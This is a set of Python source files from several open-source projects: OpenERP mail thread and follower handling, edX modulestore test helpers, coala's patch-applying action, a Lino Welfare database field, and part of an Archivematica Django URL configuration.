# we want to set a parent: force to set the parent_id to the oldest ancestor, to avoid having more than 1 level of thread
elif parent_id:
message_ids = mail_message.search(cr, SUPERUSER_ID, [('id', '=', parent_id), ('parent_id', '!=', False)], context=context)
# avoid loops when finding ancestors
processed_list = []
if message_ids:
message = mail_message.browse(cr, SUPERUSER_ID, message_ids[0], context=context)
while (message.parent_id and message.parent_id.id not in processed_list):
processed_list.append(message.parent_id.id)
message = message.parent_id
parent_id = message.id
values = kwargs
values.update({
'author_id': author_id,
'model': model,
'res_id': thread_id or False,
'body': body,
'subject': subject or False,
'type': type,
'parent_id': parent_id,
'attachment_ids': attachment_ids,
'subtype_id': subtype_id,
'partner_ids': [(4, pid) for pid in partner_ids],
})
# Avoid warnings about non-existing fields
for x in ('from', 'to', 'cc'):
values.pop(x, None)
# Create and auto subscribe the author
msg_id = mail_message.create(cr, uid, values, context=context)
message = mail_message.browse(cr, uid, msg_id, context=context)
if message.author_id and thread_id and type != 'notification' and not context.get('mail_create_nosubscribe'):
self.message_subscribe(cr, uid, [thread_id], [message.author_id.id], context=context)
return msg_id
#------------------------------------------------------
# Followers API
#------------------------------------------------------
def message_get_subscription_data(self, cr, uid, ids, user_pid=None, context=None):
""" Wrapper to get subtypes data. """
return self._get_subscription_data(cr, uid, ids, None, None, user_pid=user_pid, context=context)
def message_subscribe_users(self, cr, uid, ids, user_ids=None, subtype_ids=None, context=None):
""" Wrapper on message_subscribe, using users. If user_ids is not
provided, subscribe uid instead. """
if user_ids is None:
user_ids = [uid]
partner_ids = [user.partner_id.id for user in self.pool.get('res.users').browse(cr, uid, user_ids, context=context)]
return self.message_subscribe(cr, uid, ids, partner_ids, subtype_ids=subtype_ids, context=context)
def message_subscribe(self, cr, uid, ids, partner_ids, subtype_ids=None, context=None):
""" Add partners to the records followers. """
if context is None:
context = {}
mail_followers_obj = self.pool.get('mail.followers')
subtype_obj = self.pool.get('mail.message.subtype')
user_pid = self.pool.get('res.users').browse(cr, uid, uid, context=context).partner_id.id
if set(partner_ids) == set([user_pid]):
if context.get('operation', '') != 'create':
try:
self.check_access_rights(cr, uid, 'read')
self.check_access_rule(cr, uid, ids, 'read')
except (osv.except_osv, orm.except_orm):
return False
else:
self.check_access_rights(cr, uid, 'write')
self.check_access_rule(cr, uid, ids, 'write')
existing_pids_dict = {}
fol_ids = mail_followers_obj.search(cr, SUPERUSER_ID, ['&', '&', ('res_model', '=', self._name), ('res_id', 'in', ids), ('partner_id', 'in', partner_ids)])
for fol in mail_followers_obj.browse(cr, SUPERUSER_ID, fol_ids, context=context):
existing_pids_dict.setdefault(fol.res_id, set()).add(fol.partner_id.id)
# subtype_ids specified: update already subscribed partners
if subtype_ids and fol_ids:
mail_followers_obj.write(cr, SUPERUSER_ID, fol_ids, {'subtype_ids': [(6, 0, subtype_ids)]}, context=context)
# subtype_ids not specified: do not update already subscribed partner, fetch default subtypes for new partners
if subtype_ids is None:
subtype_ids = subtype_obj.search(
cr, uid, [
('default', '=', True), '|', ('res_model', '=', self._name), ('res_model', '=', False)], context=context)
for id in ids:
existing_pids = existing_pids_dict.get(id, set())
new_pids = set(partner_ids) - existing_pids
# subscribe new followers
for new_pid in new_pids:
mail_followers_obj.create(
cr, SUPERUSER_ID, {
'res_model': self._name,
'res_id': id,
'partner_id': new_pid,
'subtype_ids': [(6, 0, subtype_ids)],
}, context=context)
return True
def message_unsubscribe_users(self, cr, uid, ids, user_ids=None, context=None):
""" Wrapper on message_subscribe, using users. If user_ids is not
provided, unsubscribe uid instead. """
if user_ids is None:
user_ids = [uid]
partner_ids = [user.partner_id.id for user in self.pool.get('res.users').browse(cr, uid, user_ids, context=context)]
return self.message_unsubscribe(cr, uid, ids, partner_ids, context=context)
def message_unsubscribe(self, cr, uid, ids, partner_ids, context=None):
""" Remove partners from the records followers. """
user_pid = self.pool.get('res.users').read(cr, uid, uid, ['partner_id'], context=context)['partner_id'][0]
if set(partner_ids) == set([user_pid]):
self.check_access_rights(cr, uid, 'read')
self.check_access_rule(cr, uid, ids, 'read')
else:
self.check_access_rights(cr, uid, 'write')
self.check_access_rule(cr, uid, ids, 'write')
fol_obj = self.pool['mail.followers']
fol_ids = fol_obj.search(
cr, SUPERUSER_ID, [
('res_model', '=', self._name),
('res_id', 'in', ids),
('partner_id', 'in', partner_ids)
], context=context)
return fol_obj.unlink(cr, SUPERUSER_ID, fol_ids, context=context)
def _message_get_auto_subscribe_fields(self, cr, uid, updated_fields, auto_follow_fields=['user_id'], context=None):
""" Returns the list of relational fields linking to res.users that should
trigger an auto subscribe. The default list checks for the fields
- called 'user_id'
- linking to res.users
- with track_visibility set
In OpenERP V7, this is sufficent for all major addon such as opportunity,
project, issue, recruitment, sale.
Override this method if a custom behavior is needed about fields
that automatically subscribe users.
"""
user_field_lst = []
for name, column_info in self._all_columns.items():
if name in auto_follow_fields and name in updated_fields and getattr(column_info.column, 'track_visibility', False) and column_info.column._obj == 'res.users':
user_field_lst.append(name)
return user_field_lst
def message_auto_subscribe(self, cr, uid, ids, updated_fields, context=None, values=None):
""" Handle auto subscription. Two methods for auto subscription exist:
- tracked res.users relational fields, such as user_id fields. Those fields
must be relation fields toward a res.users record, and must have the
track_visilibity attribute set.
- using subtypes parent relationship: check if the current model being
modified has an header record (such as a project for tasks) whose followers
can be added as followers of the current records. Example of structure
with project and task:
- st_project_1.parent_id = st_task_1
- st_project_1.res_model = 'project.project'
- st_project_1.relation_field = 'project_id'
- st_task_1.model = 'project.task'
:param list updated_fields: list of updated fields to track
:param dict values: updated values; if None, the first record will be browsed
to get the values. Added after releasing 7.0, therefore
not merged with updated_fields argumment.
"""
subtype_obj = self.pool.get('mail.message.subtype')
follower_obj = self.pool.get('mail.followers')
new_followers = dict()
# fetch auto_follow_fields: res.users relation fields whose changes are tracked for subscription
user_field_lst = self._message_get_auto_subscribe_fields(cr, uid, updated_fields, context=context)
# fetch header subtypes
header_subtype_ids = subtype_obj.search(cr, uid, ['|', ('res_model', '=', False), ('parent_id.res_model', '=', self._name)], context=context)
subtypes = subtype_obj.browse(cr, uid, header_subtype_ids, context=context)
# if no change in tracked field or no change in tracked relational field: quit
relation_fields = set([subtype.relation_field for subtype in subtypes if subtype.relation_field is not False])
if not any(relation in updated_fields for relation in relation_fields) and not user_field_lst:
return True
# legacy behavior: if values is not given, compute the values by browsing
# @TDENOTE: remove me in 8.0
if values is None:
record = self.browse(cr, uid, ids[0], context=context)
for updated_field in updated_fields:
field_value = getattr(record, updated_field)
if isinstance(field_value, browse_record):
field_value = field_value.id
elif isinstance(field_value, browse_null):
field_value = False
values[updated_field] = field_value
# find followers of headers, update structure for new followers
headers = set()
for subtype in subtypes:
if subtype.relation_field and values.get(subtype.relation_field):
headers.add((subtype.res_model, values.get(subtype.relation_field)))
if headers:
header_domain = ['|'] * (len(headers) - 1)
for header in headers:
header_domain += ['&', ('res_model', '=', header[0]), ('res_id', '=', header[1])]
header_follower_ids = follower_obj.search(
cr, SUPERUSER_ID,
header_domain,
context=context
)
for header_follower in follower_obj.browse(cr, SUPERUSER_ID, header_follower_ids, context=context):
for subtype in header_follower.subtype_ids:
if subtype.parent_id and subtype.parent_id.res_model == self._name:
new_followers.setdefault(header_follower.partner_id.id, set()).add(subtype.parent_id.id)
elif subtype.res_model is False:
new_followers.setdefault(header_follower.partner_id.id, set()).add(subtype.id)
# add followers coming from res.users relational fields that are tracked
user_ids = [values[name] for name in user_field_lst if values.get(name)]
user_pids = [user.partner_id.id for user in self.pool.get('res.users').browse(cr, SUPERUSER_ID, user_ids, context=context)]
for partner_id in user_pids:
new_followers.setdefault(partner_id, None)
for pid, subtypes in new_followers.items():
subtypes = list(subtypes) if subtypes is not None else None
self.message_subscribe(cr, uid, ids, [pid], subtypes, context=context)
# find first email message, set it as unread for auto_subscribe fields for them to have a notification
if user_pids:
for record_id in ids:
message_obj = self.pool.get('mail.message')
msg_ids = message_obj.search(cr, SUPERUSER_ID, [
('model', '=', self._name),
('res_id', '=', record_id),
('type', '=', 'email')], limit=1, context=context)
if not msg_ids:
msg_ids = message_obj.search(cr, SUPERUSER_ID, [
('model', '=', self._name),
('res_id', '=', record_id)], limit=1, context=context)
if msg_ids:
self.pool.get('mail.notification')._notify(cr, uid, msg_ids[0], partners_to_notify=user_pids, context=context)
return True
#------------------------------------------------------
# Thread state
#------------------------------------------------------
def message_mark_as_unread(self, cr, uid, ids, context=None):
""" Set as unread. """
partner_id = self.pool.get('res.users').browse(cr, uid, uid, context=context).partner_id.id
cr.execute('''
UPDATE mail_notification SET
read=false
WHERE
message_id IN (SELECT id from mail_message where res_id=any(%s) and model=%s limit 1) and
partner_id = %s
''', (ids, self._name, partner_id))
return True
def message_mark_as_read(self, cr, uid, ids, context=None):
""" Set as read. """
partner_id = self.pool.get('res.users').browse(cr, uid, uid, context=context).partner_id.id
cr.execute('''
UPDATE mail_notification SET
read=true
WHERE
message_id IN (SELECT id FROM mail_message WHERE res_id=ANY(%s) AND model=%s) AND
partner_id = %s
''', (ids, self._name, partner_id))
return True
#------------------------------------------------------
# Thread suggestion
#------------------------------------------------------
def get_suggested_thread(self, cr, uid, removed_suggested_threads=None, context=None):
"""Return a list of suggested threads, sorted by the numbers of followers"""
if context is None:
context = {}
# TDE HACK: originally by MAT from portal/mail_mail.py but not working until the inheritance graph bug is not solved in trunk
# TDE FIXME: relocate in portal when it won't be necessary to reload the hr.employee model in an additional bridge module
if self.pool['res.groups']._all_columns.get('is_portal'):
user = self.pool.get('res.users').browse(cr, SUPERUSER_ID, uid, context=context)
if any(group.is_portal for group in user.groups_id):
return []
threads = []
if removed_suggested_threads is None:
removed_suggested_threads = []
thread_ids = self.search(cr, uid, [('id', 'not in', removed_suggested_threads), ('message_is_follower', '=', False)], context=context)
for thread in self.browse(cr, uid, thread_ids, context=context):
data = {
'id': thread.id,
'popularity': len(thread.message_follower_ids),
'name': thread.name,
'image_small': thread.image_small
}
threads.append(data)
return sorted(threads, key=lambda x: (x['popularity'], x['id']), reverse=True)[:3]
|
cpennington/edx-platform
|
common/lib/xmodule/xmodule/modulestore/tests/utils.py
|
"""
Helper classes and methods for running modulestore tests without Django.
"""
import io
import os
from contextlib import contextmanager
from contextlib2 import ExitStack
from importlib import import_module
from shutil import rmtree
from tempfile import mkdtemp
from unittest import TestCase
from uuid import uuid4
import six
from path import Path as path
from six.moves import range, zip
from xmodule.contentstore.mongo import MongoContentStore
from xmodule.modulestore.draft_and_published import ModuleStoreDraftAndPublished
from xmodule.modulestore.edit_info import EditInfoMixin
from xmodule.modulestore.inheritance import InheritanceMixin
from xmodule.modulestore.mixed import MixedModuleStore
from xmodule.modulestore.mongo.base import ModuleStoreEnum
from xmodule.modulestore.mongo.draft import DraftModuleStore
from xmodule.modulestore.split_mongo.split_draft import DraftVersioningModuleStore
from xmodule.modulestore.tests.factories import ItemFactory
from xmodule.modulestore.tests.mongo_connection import MONGO_HOST, MONGO_PORT_NUM
from xmodule.modulestore.xml import XMLModuleStore
from xmodule.modulestore.xml_importer import LocationMixin
from xmodule.tests import DATA_DIR
from xmodule.x_module import XModuleMixin
def load_function(path):
"""
Load a function by name.
path is a string of the form "path.to.module.function"
returns the imported python object `function` from `path.to.module`
"""
module_path, _, name = path.rpartition('.')
return getattr(import_module(module_path), name)
# pylint: disable=unused-argument
def create_modulestore_instance(
engine,
contentstore,
doc_store_config,
options,
i18n_service=None,
fs_service=None,
user_service=None,
signal_handler=None,
):
"""
This will return a new instance of a modulestore given an engine and options
"""
class_ = load_function(engine)
if issubclass(class_, ModuleStoreDraftAndPublished):
options['branch_setting_func'] = lambda: ModuleStoreEnum.Branch.draft_preferred
return class_(
doc_store_config=doc_store_config,
contentstore=contentstore,
signal_handler=signal_handler,
**options
)
def mock_tab_from_json(tab_dict):
"""
Mocks out the CourseTab.from_json to just return the tab_dict itself so that we don't have to deal
with plugin errors.
"""
return tab_dict
def add_temp_files_from_dict(file_dict, dir):
"""
Takes in a dict formatted as: { file_name: content }, and adds files to directory
"""
for file_name in file_dict:
with io.open("{}/{}".format(dir, file_name), "w") as opened_file:
content = file_dict[file_name]
if content:
opened_file.write(six.text_type(content))
def remove_temp_files_from_list(file_list, dir):
"""
Takes in a list of file names and removes them from dir if they exist
"""
for file_name in file_list:
file_path = "{}/{}".format(dir, file_name)
if os.path.exists(file_path):
os.remove(file_path)
class MixedSplitTestCase(TestCase):
"""
Stripped-down version of ModuleStoreTestCase that can be used without Django
(i.e. for testing in common/lib/ ). Sets up MixedModuleStore and Split.
"""
RENDER_TEMPLATE = lambda t_n, d, ctx=None, nsp='main': u'{}: {}, {}'.format(t_n, repr(d), repr(ctx))
modulestore_options = {
'default_class': 'xmodule.raw_module.RawDescriptor',
'fs_root': DATA_DIR,
'render_template': RENDER_TEMPLATE,
'xblock_mixins': (EditInfoMixin, InheritanceMixin, LocationMixin, XModuleMixin),
}
DOC_STORE_CONFIG = {
'host': MONGO_HOST,
'port': MONGO_PORT_NUM,
'db': 'test_mongo_libs_{0}'.format(os.getpid()),
'collection': 'modulestore',
'asset_collection': 'assetstore',
}
MIXED_OPTIONS = {
'stores': [
{
'NAME': 'split',
'ENGINE': 'xmodule.modulestore.split_mongo.split_draft.DraftVersioningModuleStore',
'DOC_STORE_CONFIG': DOC_STORE_CONFIG,
'OPTIONS': modulestore_options
},
]
}
def setUp(self):
"""
Set up requirements for testing: a user ID and a modulestore
"""
super(MixedSplitTestCase, self).setUp()
self.user_id = ModuleStoreEnum.UserID.test
self.store = MixedModuleStore(
None,
create_modulestore_instance=create_modulestore_instance,
mappings={},
**self.MIXED_OPTIONS
)
self.addCleanup(self.store.close_all_connections)
self.addCleanup(self.store._drop_database) # pylint: disable=protected-access
def make_block(self, category, parent_block, **kwargs):
"""
Create a block of type `category` as a child of `parent_block`, in any
course or library. You can pass any field values as kwargs.
"""
extra = {"publish_item": False, "user_id": self.user_id}
extra.update(kwargs)
return ItemFactory.create(
category=category,
parent=parent_block,
parent_location=parent_block.location,
modulestore=self.store,
**extra
)
class ProceduralCourseTestMixin(object):
"""
Contains methods for testing courses generated procedurally
"""
def populate_course(self, branching=2, emit_signals=False):
"""
Add k chapters, k^2 sections, k^3 verticals, k^4 problems to self.course (where k = branching)
"""
user_id = self.user.id
self.populated_usage_keys = {} # pylint: disable=attribute-defined-outside-init
def descend(parent, stack): # pylint: disable=missing-docstring
if not stack:
return
xblock_type = stack[0]
for _ in range(branching):
child = ItemFactory.create(
category=xblock_type,
parent_location=parent.location,
user_id=user_id
)
self.populated_usage_keys.setdefault(xblock_type, []).append(
child.location
)
descend(child, stack[1:])
with self.store.bulk_operations(self.course.id, emit_signals=emit_signals):
descend(self.course, ['chapter', 'sequential', 'vertical', 'problem'])
class MemoryCache(object):
"""
This fits the metadata_inheritance_cache_subsystem interface used by
the modulestore, and stores the data in a dictionary in memory.
"""
def __init__(self):
self.data = {}
def get(self, key, default=None):
"""
Get a key from the cache.
Args:
key: The key to update.
default: The value to return if the key hasn't been set previously.
"""
return self.data.get(key, default)
def set(self, key, value):
"""
Set a key in the cache.
Args:
key: The key to update.
value: The value change the key to.
"""
self.data[key] = value
class MongoContentstoreBuilder(object):
"""
A builder class for a MongoContentStore.
"""
@contextmanager
def build(self):
"""
A contextmanager that returns a MongoContentStore, and deletes its contents
when the context closes.
"""
contentstore = MongoContentStore(
db='contentstore{}'.format(THIS_UUID),
collection='content',
**COMMON_DOCSTORE_CONFIG
)
contentstore.ensure_indexes()
try:
yield contentstore
finally:
# Delete the created database
contentstore._drop_database() # pylint: disable=protected-access
def __repr__(self):
return 'MongoContentstoreBuilder()'
class StoreBuilderBase(object):
"""
Base class for all modulestore builders.
"""
@contextmanager
def build(self, **kwargs):
"""
Build the modulestore, optionally building the contentstore as well.
"""
contentstore = kwargs.pop('contentstore', None)
if not contentstore:
with self.build_without_contentstore(**kwargs) as (contentstore, modulestore):
yield contentstore, modulestore
else:
with self.build_with_contentstore(contentstore, **kwargs) as modulestore:
yield modulestore
@contextmanager
def build_without_contentstore(self, **kwargs):
"""
Build both the contentstore and the modulestore.
"""
with MongoContentstoreBuilder().build() as contentstore:
with self.build_with_contentstore(contentstore, **kwargs) as modulestore:
yield contentstore, modulestore
class MongoModulestoreBuilder(StoreBuilderBase):
"""
A builder class for a DraftModuleStore.
"""
@contextmanager
def build_with_contentstore(self, contentstore, **kwargs):
"""
A contextmanager that returns an isolated mongo modulestore, and then deletes
all of its data at the end of the context.
Args:
contentstore: The contentstore that this modulestore should use to store
all of its assets.
"""
doc_store_config = dict(
db='modulestore{}'.format(THIS_UUID),
collection='xmodule',
asset_collection='asset_metadata',
**COMMON_DOCSTORE_CONFIG
)
# Set up a temp directory for storing filesystem content created during import
fs_root = mkdtemp()
modulestore = DraftModuleStore(
contentstore,
doc_store_config,
fs_root,
render_template=repr,
branch_setting_func=lambda: ModuleStoreEnum.Branch.draft_preferred,
metadata_inheritance_cache_subsystem=MemoryCache(),
xblock_mixins=XBLOCK_MIXINS,
)
modulestore.ensure_indexes()
try:
yield modulestore
finally:
# Delete the created database
modulestore._drop_database() # pylint: disable=protected-access
# Delete the created directory on the filesystem
rmtree(fs_root, ignore_errors=True)
def __repr__(self):
return 'MongoModulestoreBuilder()'
class VersioningModulestoreBuilder(StoreBuilderBase):
"""
A builder class for a VersioningModuleStore.
"""
@contextmanager
def build_with_contentstore(self, contentstore, **kwargs):
"""
A contextmanager that returns an isolated versioning modulestore, and then deletes
all of its data at the end of the context.
Args:
contentstore: The contentstore that this modulestore should use to store
all of its assets.
"""
doc_store_config = dict(
db='modulestore{}'.format(THIS_UUID),
collection='split_module',
**COMMON_DOCSTORE_CONFIG
)
# Set up a temp directory for storing filesystem content created during import
fs_root = mkdtemp()
modulestore = DraftVersioningModuleStore(
contentstore,
doc_store_config,
fs_root,
render_template=repr,
xblock_mixins=XBLOCK_MIXINS,
**kwargs
)
modulestore.ensure_indexes()
try:
yield modulestore
finally:
# Delete the created database
modulestore._drop_database() # pylint: disable=protected-access
# Delete the created directory on the filesystem
rmtree(fs_root, ignore_errors=True)
def __repr__(self):
return 'SplitModulestoreBuilder()'
class XmlModulestoreBuilder(StoreBuilderBase):
"""
A builder class for a XMLModuleStore.
"""
# pylint: disable=unused-argument
@contextmanager
def build_with_contentstore(self, contentstore=None, course_ids=None, **kwargs):
"""
A contextmanager that returns an isolated xml modulestore
Args:
contentstore: The contentstore that this modulestore should use to store
all of its assets.
"""
modulestore = XMLModuleStore(
DATA_DIR,
course_ids=course_ids,
default_class='xmodule.hidden_module.HiddenDescriptor',
xblock_mixins=XBLOCK_MIXINS,
)
yield modulestore
class MixedModulestoreBuilder(StoreBuilderBase):
"""
A builder class for a MixedModuleStore.
"""
def __init__(self, store_builders, mappings=None):
"""
Args:
store_builders: A list of modulestore builder objects. These will be instantiated, in order,
as the backing stores for the MixedModuleStore.
mappings: Any course mappings to pass to the MixedModuleStore on instantiation.
"""
self.store_builders = store_builders
self.mappings = mappings or {}
self.mixed_modulestore = None
@contextmanager
def build_with_contentstore(self, contentstore, **kwargs):
"""
A contextmanager that returns a mixed modulestore built on top of modulestores
generated by other builder classes.
Args:
contentstore: The contentstore that this modulestore should use to store
all of its assets.
"""
names, generators = list(zip(*self.store_builders))
with ExitStack() as stack:
modulestores = [stack.enter_context(gen.build_with_contentstore(contentstore, **kwargs)) for gen in generators]
# Make the modulestore creation function just return the already-created modulestores
store_iterator = iter(modulestores)
next_modulestore = lambda *args, **kwargs: next(store_iterator)
# Generate a fake list of stores to give the already generated stores appropriate names
stores = [{'NAME': name, 'ENGINE': 'This space deliberately left blank'} for name in names]
self.mixed_modulestore = MixedModuleStore(
contentstore,
self.mappings,
stores,
create_modulestore_instance=next_modulestore,
xblock_mixins=XBLOCK_MIXINS,
)
yield self.mixed_modulestore
def __repr__(self):
return 'MixedModulestoreBuilder({!r}, {!r})'.format(self.store_builders, self.mappings)
def asset_collection(self):
"""
Returns the collection storing the asset metadata.
"""
all_stores = self.mixed_modulestore.modulestores
if len(all_stores) > 1:
return None
store = all_stores[0]
if hasattr(store, 'asset_collection'):
# Mongo modulestore beneath mixed.
# Returns the entire collection with *all* courses' asset metadata.
return store.asset_collection
else:
# Split modulestore beneath mixed.
# Split stores all asset metadata in the structure collection.
return store.db_connection.structures
THIS_UUID = uuid4().hex
COMMON_DOCSTORE_CONFIG = {
'host': MONGO_HOST,
'port': MONGO_PORT_NUM,
}
DATA_DIR = path(__file__).dirname().parent.parent / "tests" / "data" / "xml-course-root"
TEST_DATA_DIR = 'common/test/data/'
XBLOCK_MIXINS = (InheritanceMixin, XModuleMixin)
MIXED_MODULESTORE_BOTH_SETUP = MixedModulestoreBuilder([
('draft', MongoModulestoreBuilder()),
('split', VersioningModulestoreBuilder())
])
DRAFT_MODULESTORE_SETUP = MixedModulestoreBuilder([('draft', MongoModulestoreBuilder())])
SPLIT_MODULESTORE_SETUP = MixedModulestoreBuilder([('split', VersioningModulestoreBuilder())])
MIXED_MODULESTORE_SETUPS = (
DRAFT_MODULESTORE_SETUP,
SPLIT_MODULESTORE_SETUP,
)
MIXED_MS_SETUPS_SHORT = (
'mixed_mongo',
'mixed_split',
)
DIRECT_MODULESTORE_SETUPS = (
MongoModulestoreBuilder(),
# VersioningModulestoreBuilder(), # FUTUREDO: LMS-11227
)
DIRECT_MS_SETUPS_SHORT = (
'mongo',
#'split',
)
MODULESTORE_SETUPS = DIRECT_MODULESTORE_SETUPS + MIXED_MODULESTORE_SETUPS
MODULESTORE_SHORTNAMES = DIRECT_MS_SETUPS_SHORT + MIXED_MS_SETUPS_SHORT
SHORT_NAME_MAP = dict(list(zip(MODULESTORE_SETUPS, MODULESTORE_SHORTNAMES)))
CONTENTSTORE_SETUPS = (MongoContentstoreBuilder(),)
DOT_FILES_DICT = {
".DS_Store": None,
".example.txt": "BLUE",
}
TILDA_FILES_DICT = {
"example.txt~": "RED"
}
class PureModulestoreTestCase(TestCase):
"""
A TestCase designed to make testing Modulestore implementations without using Django
easier.
"""
MODULESTORE = None
def setUp(self):
super(PureModulestoreTestCase, self).setUp()
builder = self.MODULESTORE.build()
self.assets, self.store = builder.__enter__()
self.addCleanup(builder.__exit__, None, None, None)
|
sils1297/coala
|
coalib/results/result_actions/ApplyPatchAction.py
|
import shutil
from os.path import isfile
from os import remove
from coalib.results.result_actions.ShowPatchAction import ShowPatchAction
from coalib.results.result_actions.ResultAction import ResultAction
class ApplyPatchAction(ResultAction):
SUCCESS_MESSAGE = "Patch applied successfully."
is_applicable = staticmethod(ShowPatchAction.is_applicable)
def apply(self,
result,
original_file_dict,
file_diff_dict,
no_orig: bool=False):
"""
Apply patch
:param no_orig: Whether or not to create .orig backup files
"""
for filename in result.diffs:
pre_patch_filename = filename
if filename in file_diff_dict:
diff = file_diff_dict[filename]
pre_patch_filename = (diff.rename
if diff.rename is not False
else filename)
file_diff_dict[filename] += result.diffs[filename]
else:
file_diff_dict[filename] = result.diffs[filename]
# Backup original file, only if there was no previous patch
# from this run though!
if not no_orig and isfile(pre_patch_filename):
shutil.copy2(pre_patch_filename,
pre_patch_filename + ".orig")
diff = file_diff_dict[filename]
if diff.delete or diff.rename:
if isfile(pre_patch_filename):
remove(pre_patch_filename)
if not diff.delete:
new_filename = (diff.rename
if diff.rename is not False
else filename)
with open(new_filename, mode='w', encoding='utf-8') as file:
file.writelines(diff.modified)
return file_diff_dict
|
khchine5/lino-welfare
|
lino_welfare/modlib/debts/fields.py
|
# -*- coding: UTF-8 -*-
# Copyright 2012-2015 Luc Saffre
# This file is part of Lino Welfare.
#
# Lino Welfare is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Lino Welfare is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with Lino Welfare. If not, see
# <http://www.gnu.org/licenses/>.
"""
Database fields for `lino_welfare.modlib.debts`.
"""
from __future__ import unicode_literals
from django.db import models
from lino.api import _
class PeriodsField(models.DecimalField):
"""
Used for `Entry.periods` and `Account.periods`
(the latter holds simply the default value for the former).
It means: for how many months the entered amount counts.
Default value is 1. For yearly amounts set it to 12.
"""
def __init__(self, *args, **kwargs):
defaults = dict(
blank=True,
default=1,
help_text=_("""\
For how many months the entered amount counts.
For example 1 means a monthly amount, 12 a yearly amount."""),
#~ max_length=3,
max_digits=3,
decimal_places=0,
)
defaults.update(kwargs)
super(PeriodsField, self).__init__(*args, **defaults)
#~ class PeriodsField(models.IntegerField):
#~ """
#~ Used for `Entry.periods` and `Account.periods`
#~ (which holds simply the default value for the former).
#~ It means: for how many months the entered amount counts.
#~ Default value is 1. For yearly amounts set it to 12.
#~ """
#~ def __init__(self, *args, **kwargs):
#~ defaults = dict(
#~ max_length=3,
# max_digits=3,
#~ blank=True,
#~ null=True
#~ )
#~ defaults.update(kwargs)
#~ super(PeriodsField, self).__init__(*args, **defaults)
|
artefactual/archivematica-history
|
src/dashboard/src/main/urls.py
|
from django.conf.urls.defaults import *
from django.conf import settings
from django.views.generic.simple import direct_to_template, redirect_to
UUID_REGEX = '[\w]{8}(-[\w]{4}){3}-[\w]{12}'
urlpatterns = patterns('main.views',
# Index
(r'^$', 'home'),
# Forbidden
(r'forbidden/$', 'forbidden'),
# Transfer
(r'transfer/$', 'transfer_grid'),
(r'transfer/(?P<uuid>' + UUID_REGEX + ')/$', 'transfer_detail'),
(r'transfer/(?P<uuid>' + UUID_REGEX + ')/delete/$', 'transfer_delete'),
(r'transfer/(?P<uuid>' + UUID_REGEX + ')/microservices/$', 'transfer_microservices'),
(r'transfer/(?P<uuid>' + UUID_REGEX + ')/rights/$', 'transfer_rights_list'),
(r'transfer/(?P<uuid>' + UUID_REGEX + ')/rights/add/$', 'transfer_rights_edit'),
(r'transfer/(?P<uuid>' + UUID_REGEX + ')/rights/(?P<id>\d+)/$', 'transfer_rights_edit'),
(r'transfer/(?P<uuid>' + UUID_REGEX + ')/rights/delete/(?P<id>\d+)/$', 'transfer_rights_delete'),
(r'transfer/(?P<uuid>' + UUID_REGEX + ')/rights/grants/(?P<id>\d+)/$', 'transfer_rights_grants_edit'),
(r'transfer/status/$', 'transfer_status'),
(r'transfer/status/(?P<uuid>' + UUID_REGEX + ')/$', 'transfer_status'),
(r'transfer/select/(?P<source_directory_id>\d+)/$', 'transfer_select'),
(r'transfer/browser/$', 'transfer_browser'),
# Ingest
(r'ingest/$', 'ingest_grid'),
(r'ingest/(?P<uuid>' + UUID_REGEX + ')/$', 'ingest_detail'),
(r'ingest/(?P<uuid>' + UUID_REGEX + ')/delete/$', 'ingest_delete'),
(r'ingest/(?P<uuid>' + UUID_REGEX + ')/metadata/$', 'ingest_metadata_list'),
(r'ingest/(?P<uuid>' + UUID_REGEX + ')/metadata/add/$', 'ingest_metadata_edit'),
(r'ingest/(?P<uuid>' + UUID_REGEX + ')/metadata/(?P<id>\d+)/$', 'ingest_metadata_edit'),
(r'ingest/(?P<uuid>' + UUID_REGEX + ')/metadata/delete/(?P<id>\d+)/$', 'ingest_metadata_delete'),
(r'ingest/(?P<uuid>' + UUID_REGEX + ')/microservices/$', 'ingest_microservices'),
(r'ingest/(?P<uuid>' + UUID_REGEX + ')/rights/$', 'ingest_rights_list'),
(r'ingest/(?P<uuid>' + UUID_REGEX + ')/rights/add/$', 'ingest_rights_edit'),
(r'ingest/(?P<uuid>' + UUID_REGEX + ')/rights/(?P<id>\d+)/$', 'ingest_rights_edit'),
(r'ingest/(?P<uuid>' + UUID_REGEX + ')/rights/delete/(?P<id>\d+)/$', 'ingest_rights_delete'),
(r'ingest/(?P<uuid>' + UUID_REGEX + ')/rights/grants/(?P<id>\d+)/$', 'ingest_rights_grants_edit'),
(r'ingest/(?P<uuid>' + UUID_REGEX + ')/upload/$', 'ingest_upload'),
(r'ingest/status/$', 'ingest_status'),
(r'ingest/status/(?P<uuid>' + UUID_REGEX + ')/$', 'ingest_status'),
(r'ingest/normalization-report/(?P<uuid>' + UUID_REGEX + ')/$', 'ingest_normalization_report'),
(r'ingest/preview/aip/(?P<jobuuid>' + UUID_REGEX + ')/$', 'ingest_browse_aip'),
(r'ingest/preview/normalization/(?P<jobuuid>' + UUID_REGEX + ')/$', 'ingest_browse_normalization'),
# Jobs and tasks (is part of ingest)
(r'jobs/(?P<uuid>' + UUID_REGEX + ')/explore/$', 'jobs_explore'),
(r'jobs/(?P<uuid>' + UUID_REGEX + ')/list-objects/$', 'jobs_list_objects'),
(r'tasks/(?P<uuid>' + UUID_REGEX + ')/$', 'tasks'),
(r'task/(?P<uuid>' + UUID_REGEX + ')/$', 'task'),
# Access
(r'access/$', 'access_list'),
(r'access/(?P<id>\d+)/delete/$', 'access_delete'),
# Lookup
(r'lookup/rightsholder/(?P<id>\d+)/$', 'rights_holders_lookup'),
# Autocomplete
(r'autocomplete/rightsholders$', 'rights_holders_autocomplete'),
# Administration
(r'administration/$', 'administration'),
#(r'administration/edit/(?P<id>\d+)/$', 'administration_edit'),
(r'administration/dip/$', 'administration_dip'),
(r'administration/dip/edit/(?P<id>\d+)/$', 'administration_dip_edit'),
(r'administration/dips/atom/$', 'administration_atom_dips'),
(r'administration/dips/contentdm/$', 'administration_contentdm_dips'),
(r'administration/sources/$', 'administration_sources'),
(r'administration/sources/delete/json/(?P<id>\d+)/$', 'administration_sources_delete_json'),
(r'administration/processing/$', 'administration_processing'),
(r'administration/sources/json/$', 'administration_sources_json'),
# Disabled until further development can be done
#(r'administration/search/$', 'administration_search'),
